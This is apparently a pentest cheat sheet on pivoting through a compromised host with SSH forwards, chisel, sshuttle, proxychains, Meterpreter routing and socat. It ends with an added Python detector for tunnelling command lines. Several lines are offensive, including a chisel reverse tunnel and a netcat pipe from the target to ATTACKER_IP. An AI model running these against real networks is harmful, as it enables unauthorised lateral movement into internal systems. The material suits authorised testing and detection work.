SSH Pivoting (Local & Remote Forwards)
Local Port Forward (access internal service from Kali)
ssh -L 8888:internal_host:80 user@pivot_host
Access http://localhost:8888 on Kali → forwards to internal_host:80 via pivot_host.
Remote Port Forward (expose service from Kali to pivot)
ssh -R 4444:127.0.0.1:4444 user@pivot_host
The pivot host can now reach Kali's port 4444 (e.g., for a reverse shell listener).
Dynamic Proxy (SOCKS5)
ssh -D 9050 user@pivot_host
Use with proxychains to route tools through the tunnel:
proxychains nmap -sT -Pn -p 80 internal_host
Chisel (TCP tunnel via HTTP)
Attacker (listener):
chisel server -p 8000 --reverse
Victim (reverse tunnel):
chisel client ATTACKER_IP:8000 R:1080:127.0.0.1:1080
Now the attacker can access the victim's 127.0.0.1:1080 via their own localhost:1080.
SSH over Netcat (when no SSH binary available)
# On target:
mkfifo /tmp/pipe; nc ATTACKER 2222 0</tmp/pipe | ssh user@pivot_host 1>/tmp/pipe
SSHuttle (easy transparent routing)
# Full internal access routing via SSH
sshuttle -r user@pivot_host 10.10.10.0/24
Now tools like nmap, curl, etc. work transparently against internal targets.
Socks Proxies + Proxychains
Confirm SOCKS setup with:
proxychains curl http://internal_host
Edit /etc/proxychains.conf and ensure:
[ProxyList]
socks5 127.0.0.1 9050
Meterpreter Route + Socks
# In Meterpreter session
run autoroute -s 10.10.10.0/24
# Background meterpreter shell, then:
use auxiliary/server/socks_proxy
set SRVPORT 1080
run
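Use proxychains with socks5 127.0.0.1 1080 for tool routing (the socks_proxy module's VERSION option defaults to 5, so the proxychains entry must be socks5 unless VERSION is changed).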
Port Forwarding via Metasploit
# Forward local port 8080 to internal 10.10.10.10:80
portfwd add -l 8080 -p 80 -r 10.10.10.10
Now browse http://localhost:8080 to reach the internal host.
Socat Relays (custom tunnels)
# Simple TCP relay: listen on 4444 and forward each connection to 10.10.10.10:22
socat TCP-LISTEN:4444,fork TCP:10.10.10.10:22
# Relay local port 1080 to internal:80 through the SOCKS4A proxy on 127.0.0.1:9050
socat TCP-LISTEN:1080,fork SOCKS4A:127.0.0.1:internal:80,socksport=9050
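
For the detection side of the commands on this page, the following added example (not part of the original page) classifies process command lines, such as those from process-creation audit logs, by the tunnelling technique they request. It walks ssh's option syntax so that bundled flags (-NfD 9050) and forwards given after the host are caught, while a -L belonging to the remote command is not. Matching on the program's basename is an assumption (a renamed binary would need other telemetry), and the function names and sample lines are constructed for illustration.

```python
import shlex

# ssh(1) options that consume an argument; needed to walk bundled flags (-NfD 9050).
SSH_ARG_OPTS = set("BbcDEeFIiJLlmOoPpQRSWw")
FORWARDS = {"L": "ssh local forward", "R": "ssh remote forward",
            "D": "ssh dynamic SOCKS proxy"}
FORWARD_KEYWORDS = ("localforward", "remoteforward", "dynamicforward")

def classify_ssh(args):
    """Return the forward types requested by an ssh argument vector."""
    hits, seen_host, i = [], False, 0
    while i < len(args):
        tok, i = args[i], i + 1
        if not tok.startswith("-") or len(tok) == 1:
            if seen_host:        # second bare word starts the remote command
                break
            seen_host = True     # ssh resumes option parsing after the host
            continue
        for pos, flag in enumerate(tok[1:], 1):
            if flag in SSH_ARG_OPTS:
                value = tok[pos + 1:]           # attached form: -L8888:host:80
                if not value and i < len(args):
                    value, i = args[i], i + 1   # separate form: -L 8888:host:80
                if flag in FORWARDS:
                    hits.append(FORWARDS[flag])
                elif flag == "o" and value.lower().lstrip().startswith(FORWARD_KEYWORDS):
                    hits.append("ssh forward set with -o")
                break            # the rest of the token was this flag's value
    return hits

def detect_tunnels(cmdline):
    """Map one process command line to the tunnelling techniques it matches."""
    argv = shlex.split(cmdline) or [""]
    prog, args = argv[0].rsplit("/", 1)[-1], argv[1:]
    if prog == "ssh":
        return classify_ssh(args)
    if prog in ("chisel", "sshuttle", "proxychains", "proxychains4"):
        return [prog]
    if prog == "socat" and any(a.upper().startswith("TCP-LISTEN:")
                               and "fork" in a.lower().split(",") for a in args):
        return ["socat listening relay"]
    return []

# Constructed sample command lines (not taken from a real host).
SAMPLES = ["/usr/bin/ssh -NfD 9050 user@pivot_host", "ssh user@pivot_host ls -L",
           "socat TCP-LISTEN:4444,fork TCP:10.10.10.10:22"]
if __name__ == "__main__":
    for line in SAMPLES:
        print(detect_tunnels(line), "<-", line)
```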